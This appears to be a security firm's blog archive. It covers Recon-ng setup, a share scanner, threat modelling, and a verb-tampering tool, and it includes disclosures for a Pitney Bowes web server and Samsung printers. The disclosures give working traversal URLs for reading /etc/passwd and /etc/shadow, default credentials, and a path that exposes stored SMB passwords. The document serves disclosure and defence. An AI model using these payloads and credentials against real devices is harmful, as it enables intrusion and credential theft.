Archives

All posts by SNM

Intro

Recon-ng is an open-source reconnaissance framework written in Python. This SQLite database driven tool incorporates Python modules and API keys, which lets it act as a conduit for many tools ranging from The Harvester to Metasploit. It is an awesome standalone reconnaissance tool in its own right. As a side note, we all totally have a geeky nerd crush on LaNMaSteR53.

This part of the series covers installation and adding API keys. Later we will show you how to create a workspace, import data into the database, and export data for use with other tools.

For our reconnaissance targets, we will use HackerOne’s directory of companies. This is not our way of saying, “Go out and hack these companies,” but our way of doing safe recon and providing consistent screenshots that are easy to follow. This is also our way of introducing you to HackerOne and the bug bounty community if you are not already familiar with it.

Getting Started

While most penetration testers will be running this out of Kali Linux, the prerequisites (git and pip) may need to be installed before you start. Fortunately, this is easy on most Linux flavors and requires just a few simple commands:

sudo apt-get update
sudo apt-get install git
sudo apt-get install python-pip python-dev build-essential
sudo pip install --upgrade pip
sudo pip install --upgrade virtualenv

Next, clone Recon-ng from Bitbucket (Figure 1). In this tutorial we clone into the home directory, but feel free to use whatever directory structure works for you.

git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git

Figure 1: git install

Next, change directory into the newly created recon-ng and list the contents (Figure 2).

cd recon-ng
ls

Figure 2: recon-ng contents

We will use the REQUIREMENTS file to finish installing the dependencies for recon-ng.

pip install -r REQUIREMENTS

At this point the installation is almost ready to use. We will go over a little bit of information now, while you’re still paying attention, and then get recon-ng running and the API keys loaded.

The installation of recon-ng also created a hidden directory, .recon-ng, inside your home directory. This directory is empty at first; it is where your keys.db and your workspaces will be created. After you run recon-ng for the first time, a workspace directory and keys.db are created in the hidden .recon-ng directory (Figure 3).


Figure 3: .recon-ng directory

To run recon-ng, go to the directory where you ran the “git clone” command. This is where the magic happens.

cd recon-ng 
./recon-ng

Don’t worry if you get the “_api key not set” error (Figure 4). We have not added any API keys yet.


Figure 4: Initial Start

From our screen we can see that there are 76 Recon modules, 8 Reporting modules, 2 Import modules, 2 Exploitation modules, and 2 Discovery modules. We are also using the “default” workspace (Figure 5).


Figure 5: Recon-ng start screen

Close recon-ng and let’s look at the modules and the underlying code (Figure 6).

cd modules
cd recon
ls

Figure 6: Module Directory

If we go into the module directory and then into a module, we can see the Python script that does all the magic (Figure 7).


Figure 7: Module Content

Adding API Keys

As I said in the introduction, this is a database driven tool. Now it’s time to add information to the database.

The API keys are used by the modules to gather information into the SQLite database. Some of the API keys are free, but some can be expensive. I will keep this tutorial to the free API keys that are available.

After going back into the recon-ng directory and typing “./recon-ng”, you will be inside the recon-ng console (Figure 8).

keys list

Figure 8: Keys List

The following command is an example of adding the shodan_api key (bottom of Figure 8; look closely, it is there).

keys add shodan_api <paste key here>

API Keys Signup URLs

Signing up for the API keys is the least fun and most time-consuming part of the setup. Showing each signup would be lethally boring, so here is the list of URLs. All links open in a new window because we are thoughtful like that.

Google API – https://console.developers.google.com/apis/library
Bing API – https://msdn.microsoft.com/en-us/library/bing-ads-getting-started.aspx
Facebook API – https://developers.facebook.com/docs/apis-and-sdks
Instagram API – https://www.programmableweb.com/api/instagram
Linkedin API – https://developer.linkedin.com/docs/rest-api
Shodan API – https://developer.shodan.io/
Twitter API – https://apps.twitter.com/
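Since every key you add above is stored in clear text in ~/.recon-ng/keys.db, it is worth checking two things after the signup marathon: which of the expected keys are actually set, and whether the file is readable by anyone but you. The script below is an added example, not part of the post or of recon-ng; it assumes the keys.db schema used by recon-ng 4.x (a single keys(name, value) table), and all key names other than shodan_api are assumed from the signup list, so compare them with the output of "keys list".

```python
import os
import sqlite3
import stat
import tempfile

# Assumption: keys.db holds one table, keys(name TEXT PRIMARY KEY, value TEXT).
# That matches the schema recon-ng 4.x creates, but verify against your copy.
KEYS_SCHEMA = "CREATE TABLE IF NOT EXISTS keys (name TEXT PRIMARY KEY, value TEXT)"

# Key names for the services in the signup list. Only shodan_api appears in the
# post; the others are assumed, so compare them with the output of "keys list".
EXPECTED_KEYS = ("google_api", "bing_api", "facebook_api", "instagram_api",
                 "linkedin_api", "shodan_api", "twitter_api")

def audit_keys(db_path, expected=EXPECTED_KEYS):
    """Classify each expected key as set, present but empty, or missing."""
    con = sqlite3.connect(db_path)
    try:
        rows = dict(con.execute("SELECT name, value FROM keys"))
    finally:
        con.close()
    result = {"set": [], "empty": [], "missing": []}
    for name in expected:
        if name not in rows:
            result["missing"].append(name)
        elif not (rows[name] or "").strip():
            result["empty"].append(name)
        else:
            result["set"].append(name)
    return result

def permission_issues(mode):
    """Problems with a file mode for a file that holds clear-text API keys."""
    issues = []
    if mode & (stat.S_IRGRP | stat.S_IWGRP):
        issues.append("group can read or write keys.db")
    if mode & (stat.S_IROTH | stat.S_IWOTH):
        issues.append("other users can read or write keys.db")
    return issues

def build_sample_db(db_path):
    """Constructed sample: shodan_api filled in, twitter_api added with no value."""
    con = sqlite3.connect(db_path)
    with con:
        con.execute(KEYS_SCHEMA)
        con.execute("INSERT INTO keys VALUES (?, ?)", ("shodan_api", "EXAMPLE-KEY"))
        con.execute("INSERT INTO keys VALUES (?, ?)", ("twitter_api", ""))
    con.close()
    return db_path

def run_demo():
    """Build the sample database in a temp dir, audit it, and check its mode."""
    path = build_sample_db(os.path.join(tempfile.mkdtemp(), "keys.db"))
    os.chmod(path, 0o644)   # the mode a careless copy might leave behind
    loose = permission_issues(os.stat(path).st_mode)
    os.chmod(path, 0o600)   # owner-only, what a key store should have
    tight = permission_issues(os.stat(path).st_mode)
    return {"audit": audit_keys(path), "loose": loose, "tight": tight}
```

Point audit_keys at the real ~/.recon-ng/keys.db to get the same report for your own install.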


Part 2: Workspaces and Importing Data

This PowerShell script, written by our friend Rafael Montoya, will allow you to scan for open shares based on a list you provide or a subnet you enter. It will process hostnames or IP addresses and attempt to connect to the shares on a machine, using WMI to make the connection.

Using PowerShell, it calls Get-WMIObject with the class Win32_ConnectionShare, and it can be modified to list more properties. The properties currently listed are PSComputerName, Name, Path and Description.

For use with subnets and CIDR notation, GET-IPRange will list out the IP addresses in the subnet that was entered. For a /24 it will list all 254 usable addresses and scan those IPs for an SMB share.

The framework is basically a simple interface to these two functions: it asks you to provide a CIDR or a file and, depending on which one you pick, runs the proper command to get the shares. The script writes the results to a separate file that you specify; it appends to that file and only writes shares that it finds.

All the code you need is here: GitHub

We have been trying to contact Pitney Bowes for ten months to report a security issue. After multiple attempts using email and Twitter, we decided to release the vulnerability to the public so that companies can protect themselves. One of the main driving factors behind this was finding out that Pitney Bowes sells security services to other companies. We strongly believe in responsible disclosure, and we also believe that if you sell security services you should be responsive to other researchers reporting issues in your products. While the directory traversal is serious, it also exposes weak default credentials which may work on other Pitney Bowes products.


Pitney Bowes MS1 Slinger Web Server Directory Traversal

Known Vulnerable Version
scversion=05.00.0021
AppScSchema=01.12.0005.0000

Proof of Concept

  1. The Slinger web service listens on TCP port 8008
  2. Retrieve etc/passwd: http://<IP>:8008/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
  3. Retrieve etc/shadow: http://<IP>:8008/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow
  4. The default credentials are pb:pb
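The requests above hide the traversal behind percent-encoded slashes (%2f), so a log search for a literal "../" would miss them. The script below is an added example for the defending side, not part of the advisory: it decodes each request path until it is stable (catching single and double encoding), resolves the ".." segments, and flags any request that climbs above the web root. The log lines are constructed samples in the common access-log format.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines; the second mimics the advisory's pattern.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2016:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2016:10:00:01 +0000] "GET /%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1024
10.0.0.9 - - [01/Jan/2016:10:00:02 +0000] "GET /images/../css/site.css HTTP/1.1" 200 300
10.0.0.11 - - [01/Jan/2016:10:00:03 +0000] "GET /%252e%252e/%252e%252e/etc/shadow HTTP/1.1" 403 0
"""

# client, ident, user, [timestamp] "METHOD path ..."
REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)')

def fully_decode(path, max_rounds=3):
    """Percent-decode until nothing changes (bounded), so %2f and %252e both resolve."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def escapes_root(path):
    """True if the decoded path climbs above the web root at any point."""
    depth = 0
    for segment in fully_decode(path).replace("\\", "/").split("/"):
        if segment == "..":
            depth -= 1
            if depth < 0:        # more ".." than real directories: escaped
                return True
        elif segment and segment != ".":
            depth += 1
    return False

def find_traversal(log_text):
    """Return (client ip, raw request path) for every request that escapes the root."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if m and escapes_root(m.group("path")):
            hits.append((m.group("ip"), m.group("path")))
    return hits

if __name__ == "__main__":
    for ip, path in find_traversal(SAMPLE_LOG):
        print(f"traversal attempt from {ip}: {path}")
```

Note that "/images/../css/site.css" is not flagged: it never leaves the root, and treating every ".." as hostile produces noise that buries the real hits.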

About a year ago, during a network penetration test, I found an information disclosure vulnerability in a Samsung printer. The disclosure was fairly serious; NTLM hashes for any network accounts were stored in a CSV file. I’m not a web application penetration tester, but luckily the connection was slow enough that I watched the page load briefly and then redirect to the next page. This definitely highlights the importance of manual testing.

Because this has been responsibly disclosed and patched it isn’t technically an 0day.

The firmware fixing the vulnerability was released over six months ago, and I didn’t want to publish any vulnerability information irresponsibly. The following is the information submitted to Samsung and links to the updated firmware. Updating any Samsung printers is important. Equally important is adding printers and other peripheral devices to your patching program.


SyncThru Web SMB Password Disclosure

Known Vulnerable Versions

Samsung SCX-5835_5935 Series Printer
Main Firmware Version: 2.01.00.26
Network Firmware Version: V4.01.05(SCX-5835/5935) 12-22-2008
Engine Firmware Version: 1.20.73
UI Firmware Version: V1.03.01.55 07-13-2009
Finisher Firmware Version: Not Installed
PCL5E Firmware Version: PCL5e 5.87 11-07-2008
PCL6 Firmware Version: PCL6 5.86 10-28-2008
PostScript Firmware Version: PS3 V1.93.06 12-19-2008
SPL Firmware Version: SPL 5.32 01-03-2008
TIFF Firmware Version: TIFF 0.91.00 10-07-2008

Samsung SCX-5635 Series
Main Firmware Version: 2.01.01.18 12-08-2009
Network Firmware Version: V4.01.16(SCX-5635) 12-04-2009
Engine Firmware Version: 1.31.32
PCL5E Firmware Version: PCL5e 5.92 02-12-2009
PCL6 Firmware Version: PCL6 5.93 03-21-2009
PostScript Firmware Version: PS3 1.94.06 12-22-2008
TIFF Firmware Version: TIFF 0.91.00 10-07-2008

Proof of Concept

  1. This procedure does not seem to work using Internet Explorer 7 but behaves as expected with Firefox 4.0.1.
  2. Using the default username and password (admin/admin), it is possible to obtain all credentials used for SMB file transfer. To obtain the file, access http://<printer url>/smb_serverList.csv
  3. The UserName and UserPassword fields are unencrypted and visible using any text editor.

Links to Updated Firmware
http://downloadcenter.samsung.com/content/FM/201508/20150825111208555/SCX5635_V2.01.01.28_0401113_1.00.zip
http://downloadcenter.samsung.com/content/FM/201508/20150825112233867/SCX5835_5935_V2.01.00.56_0401113_1.01.zip

Acknowledgements
Samsung security and I had a few miscommunications and I chose to hold off on releasing this until I knew that a patch was available. When I inquired again they immediately rectified the situation.

Contact security@samsung.com if you happen to find any additional vulnerabilities.

Now that you’ve identified what you have to protect, the next step is to figure out who you are protecting it from. This concept is much easier to understand. Almost all actors fall into two broad categories: internal and external actors.

Internal actors are employees, contractors, and third parties with access to your assets. Third parties could be employees of your cloud provider or the company that processes benefits and payroll.

Internal threats can result from actors inadvertently using their privilege improperly, such as creating a misconfiguration or clicking a link in a phishing email. Internal actors can also act maliciously on purpose, knowingly creating threats in the environment such as stealing data or installing malicious software.

  • Internal Actors
    • Employees
    • Contractors
    • Third Parties with access to assets
  • Internal Malicious Actors
    • Disgruntled Employees
    • Internal System Controlled by External Actor

Due to the inherent trust given to internal actors, the potential impact from these actors is higher than from external actors. While external actors make for better news stories and TV shows, it is imperative to review and mitigate threats from internal actors.

There are a number of different types of external actors, each with different motivations and goals.

  • External Malicious Actors
    • Hackers
    • Crackers
    • Hacktivists
    • Criminal Elements
    • Nation-States
    • Industrial Espionage

While the term Hacker has become synonymous with any individual with nefarious motives, the term is usually used for a curious, technically savvy individual who gains unauthorized privileges to a system without malicious intent.

On the other hand, Crackers are individuals with malicious intent who intentionally try to bypass security controls.

As activity moved online, ordinary protesters morphed into Hacktivists. Hacktivists target an organization with a political or social motive. While hackers or crackers choose targets of opportunity or with a financial motive, Hacktivists target a sector or organization for ideological reasons. Because of that ideological focus, hacktivists may expend more time and effort on a target.

Criminal elements are attempting to monetize the assets of an organization. This is a fancy way of saying they will sell credit card numbers, personal information, or run bitcoin miners on computers. Ransomware, which encrypts user data and requires a ransom to access the encrypted files, is a common way to extort organizations for money.

Nation-States are highly funded and operate on extended time frames, usually in terms of years. Nation-states are incredibly difficult to defend against due to the additional levels of expertise they can bring to bear. If you are in an industry commonly targeted by a nation-state (such as Defense or Aerospace), focusing on breach detection and having a close relationship with law enforcement is paramount.

Industrial espionage is a catch-all term for any of the above individuals focusing on stealing trade secrets or sensitive organization data. Nation-states may engage in industrial espionage to give their companies a competitive edge. Criminal elements may target an organization to sell any information obtained during a breach or sell information found during an untargeted breach. Hacktivists will expose data found to further their ideological cause.

Now that you’ve determined which actors are most likely in your threat model and which would cause the largest potential impact, you can create a list of threats to focus on.

A quick example would be a coal company operating a mine.

Asset               Actor                           Threat        Mitigation
External Website    Hacktivists/Hackers/Crackers    Defacement    Quarterly Web Application Scans
Personnel HR Data   Employees/Third Party           Data Theft    Access Control Policies
Internal Network    Criminal Elements               Phishing      Phishing Awareness Training

Obviously, this list would be very long for any organization, but at some point many of the mitigation elements will overlap. In the example above, the Access Control Policies that protect Personnel HR Data from Data Theft also protect it if a criminal element gains unauthorized access to the network. The best mitigation items protect multiple assets from a variety of actors and eliminate most of the risk.

Where to Start

The simplest threat model is something (Asset) being manipulated by someone or something (Actor), resulting in a threat.


Threat Model Overview

This post deals with the first part of the equation.


Threat Model Asset

What are you protecting? Computer systems are relatively expensive to purchase. A server and attached disks that cost five thousand dollars to purchase new can easily store millions of dollars worth of data. Prior to engaging any company for a security assessment, it is imperative to understand exactly what needs to be protected and why.

Data and Data Flow

What is your company’s secret sauce? If you are protecting design documents for a widget, there is a chain of systems that all require protection. The storage system needs to be protected from unauthorized access. The end user systems used to modify the documents require that same level of protection. The entire network that transmits the documents also needs to be protected. All of this has to be done within a fixed budget and without affecting the company’s ability to make money. While Secure Network Management makes money securing networks, most companies do not.

Hardware

Why would someone want to compromise a computer? Data is valuable, but computers and networks can also be monetized. Bitcoin mining reduces the computing power available for legitimate activities and increases electricity usage. Spam malware uses computing power and network bandwidth, and can get a legitimate business blacklisted by SMTP servers.

Now What

Know what your network is. While this sounds easy enough, it is normally one of the limiting factors. That is easy, right? You use that one 10.10.10.0/24 network for all your computers and servers. Done! Well…except each wireless access point uses a 192.168.1.0/24 network, and the LAN-to-LAN tunnel into the cloud provider’s network uses that 10.10.11.0/28 network. And that one guy who brought a wireless router in from home so he could watch movies on his iPad during work…I wish I had made that last one up. Better update all the spreadsheets! Security assessments are garbage in/garbage out; the assessors will only test what is in the scope you provide or authorize. If you do not know, or don’t have the technical expertise to determine, all of the networks in use, any reputable security or IT support company can review the network fabric. This review should not be a long or costly engagement.

Most people underestimate the number of devices on their network by at least 30%. Everything with a network cable is a potential target. Server and computer counts are normally pretty accurate. Printers, scanners, and peripherals are normally underestimated, if included at all. Network devices beyond the core switch and router normally do not show up on device spreadsheets. Obtaining a fairly accurate count of devices using a simple network scanner is easily done by a competent systems administrator, security company, or IT support company.

You are now a few days into getting an asset list in order. This is a solid investment with or without an assessment. You cannot protect what you don’t know about.
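The gap between the spreadsheet and reality described above is easy to measure once you have a scan. The script below is an added example, not part of the post: it takes the documented networks and the device spreadsheet on one side and a scanner's list of live hosts on the other, then reports which hosts are known, which are on a documented network but missing from the spreadsheet, and which sit on a network nobody documented (the access-point and tunnel subnets from the text). All networks, devices and scan output are constructed, and the /24 guess for undocumented subnets is an assumption to be confirmed.

```python
import ipaddress

# What the spreadsheet says exists (constructed).
DOCUMENTED_NETWORKS = ["10.10.10.0/24"]
SPREADSHEET_DEVICES = {"10.10.10.1": "core-router", "10.10.10.10": "fileserver",
                       "10.10.10.20": "dc01", "10.10.10.50": "ws-alice"}

# What a simple network scanner reported (constructed, one live host per line).
SCAN_RESULTS = """\
10.10.10.1 up
10.10.10.10 up
10.10.10.20 up
10.10.10.50 up
10.10.10.77 up
10.10.10.200 up
192.168.1.1 up
192.168.1.23 up
10.10.11.2 up
"""

def parse_scan(text):
    """Pull the live addresses out of the scanner output."""
    hosts = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 2 and parts[1] == "up":
            hosts.append(ipaddress.ip_address(parts[0]))
    return hosts

def reconcile(hosts, documented_networks, spreadsheet):
    """Sort live hosts into: on the spreadsheet, missing from it but on a documented
    network, or sitting on a network the spreadsheet does not know about."""
    nets = [ipaddress.ip_network(n) for n in documented_networks]
    report = {"known": [], "unlisted": [], "undocumented_network": []}
    for host in hosts:
        if str(host) in spreadsheet:
            report["known"].append(str(host))
        elif any(host in net for net in nets):
            report["unlisted"].append(str(host))
        else:
            report["undocumented_network"].append(str(host))
    return report

def suspected_networks(report, prefix=24):
    """Candidate subnets to add to the documentation. The /24 is only a starting
    guess (assumption); the real prefix, like the /28 tunnel, must be confirmed."""
    nets = {ipaddress.ip_network(f"{h}/{prefix}", strict=False)
            for h in report["undocumented_network"]}
    return sorted(str(n) for n in nets)

def undercount_percent(report, spreadsheet):
    """How far the spreadsheet falls short of the live device count, in percent."""
    live = sum(len(v) for v in report.values())
    return round(100.0 * (live - len(spreadsheet)) / live, 1)
```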


End of Step 1: What you know – The networks and devices in use and data that is stored, processed, and transmitted on the network.

There are a few things that I didn’t care for about hosting code on our website. Not being able to directly upload and download Python code as a .py file was a real pain.

I use GitHub to download other great projects for penetration testing and decided to see how complicated it was to set up. It was super easy; there was even a HELLO WORLD tutorial.

All of the code will continue to be hosted on this page but new projects will contain a link to the GitHub repository.

Secure Network Management on GitHub

Have you ever manually tested the Glassfish Authentication Bypass (CVE Details)? What about manually testing it on 40+ servers while dealing with indecisive people patching systems on the fly? I had that wonderful opportunity while running tests for a federal agency.

After all the headache and bureaucracy, I wrote a quick python program just to test for that specific case of verb tampering.

Time passed…and I switched jobs. During the interim, I spent a lot of time thinking about web verbs and what I could use them for as a penetration tester. Web verb tampering is on OWASP’s list but doesn’t seem to get the same amount of attention that the different types of injections command.

What this led to was Verbinator. Verbinator tests web verbs and cases. Lots of web verbs. I found all of the RFC-specified verbs plus some others used mostly by Microsoft. All of the RFC numbers and verbs are in the source if you’re interested. As a bonus, you can also cram some random text in for the verb, because web servers absolutely LOVE unexpected input. While reading return data is barrels of fun, I also added a differential ability to show whether the response changed when the web verb case was altered.
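The reason odd-case and made-up verbs are worth testing at all is the access-control mistake below. This is an added example, not Verbinator's code: a constructed dispatcher whose login check only fires for the verbs its author expected, beside a hardened one that refuses unknown verbs up front and applies the login check regardless of verb. HTTP method names are case-sensitive, so "get" really is a different verb from "GET"; the routes, token and handlers are constructed.

```python
ALLOWED_METHODS = {"GET", "HEAD", "POST"}   # everything the app actually serves
PROTECTED_PATHS = {"/admin"}                 # routes that must require a login

def is_authenticated(headers):
    # Constructed stand-in; a real application validates a session or token here.
    return headers.get("Authorization") == "Bearer example-token"

def route(path):
    """Constructed routing: 200 for known paths, 404 otherwise."""
    return 200 if path in PROTECTED_PATHS or path == "/" else 404

def vulnerable_dispatch(method, path, headers):
    """Deny-list thinking: the login check is applied only to the verbs the author
    expected. "get", HEAD, TRACE or random text never reaches the check and goes
    straight to the handler, which is the verb tampering case Verbinator probes."""
    if path in PROTECTED_PATHS and method in ("GET", "POST"):
        if not is_authenticated(headers):
            return 401
    return route(path)

def hardened_dispatch(method, path, headers):
    """Allow-list thinking: unknown or odd-case verbs are refused before routing
    (methods are case-sensitive, so "get" is not "GET"), and the login check does
    not depend on the verb at all."""
    if method not in ALLOWED_METHODS:
        return 405
    if path in PROTECTED_PATHS and not is_authenticated(headers):
        return 401
    return route(path)

def verb_matrix(dispatch, path, headers,
                verbs=("GET", "get", "HEAD", "POST", "TRACE", "FOO")):
    """One status per verb for a path: the raw material of a verb-tampering test."""
    return {verb: dispatch(verb, path, headers) for verb in verbs}

def differential(matrix, baseline="GET"):
    """Verbs whose response differs from the baseline verb's response, which is
    the "did changing the verb change anything" view the post describes."""
    return sorted(v for v, status in matrix.items() if status != matrix[baseline])
```

Running verb_matrix against the vulnerable dispatcher with no credentials shows 401 for GET and POST but 200 for everything else; the hardened one answers 401 for the served verbs and 405 for the rest.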

If you have any questions, comments, or ideas for improving the program, please let me know.

This is a direct collaboration with Doofenshmirtz Evil Incorporated all work is subject to platypus attack.

Source: verbinator (rename the downloaded file to .py)

Basic usage: see the verbinator-use screenshot.